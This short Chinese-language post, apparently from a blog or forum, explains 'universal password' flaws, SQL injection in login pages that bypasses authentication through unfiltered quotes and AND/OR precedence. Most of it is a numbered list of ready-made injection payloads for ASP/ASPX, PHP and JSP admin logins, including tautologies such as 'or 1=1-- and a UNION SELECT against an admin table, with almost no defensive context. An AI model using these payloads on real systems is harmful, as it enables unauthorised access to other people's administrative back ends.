万能密码漏洞,其实也是注入漏洞的一种,这是因为编程的时候逻辑上考虑不足,没有对提交字符未过滤或者过滤不严,从而导致了这种万能密码的漏洞的出现。逻辑上考虑不足,是在and和or上面没有考虑到他们的关系,在逻辑表达式里,AND是要高于OR的顺序优先级,这为万能密码漏洞提供了前提条件;单引号没有过滤又为漏洞提供了触发条件,两者一起就出现了这类漏洞。这类的漏洞,一般都出现在后台登录页面上,所以,这类漏洞就被俗称为万能密码漏洞。
没有过滤单引号:触发注入漏洞,组合一系列注入语句
优先级:NOT > AND > OR 导致注入漏洞可以饶过sql判断语句,直接进入后台
asp aspx万能密码
1:"or "a"="a
2: ')or('a'='a
3:or 1=1--
4:'or 1=1--
5:a'or' 1=1--
6:"or 1=1--
7:'or'a'='a
8:"or"="a'='a
9:'or''='
10:'or'='or'
11: 1 or '1'='1'=1
12: 1 or '1'='1' or 1=1
13: 'OR 1=1%00
14: "or 1=1%00
15: 'xor
16: 用户名 ' UNION Select 1,1,1 FROM admin Where ''=' (替换表名admin)
密码 1
PHP万能密码
'or 1=1/*
jsp 万能密码
1'or'1'='1
-------------
等待有时间再详细分析!
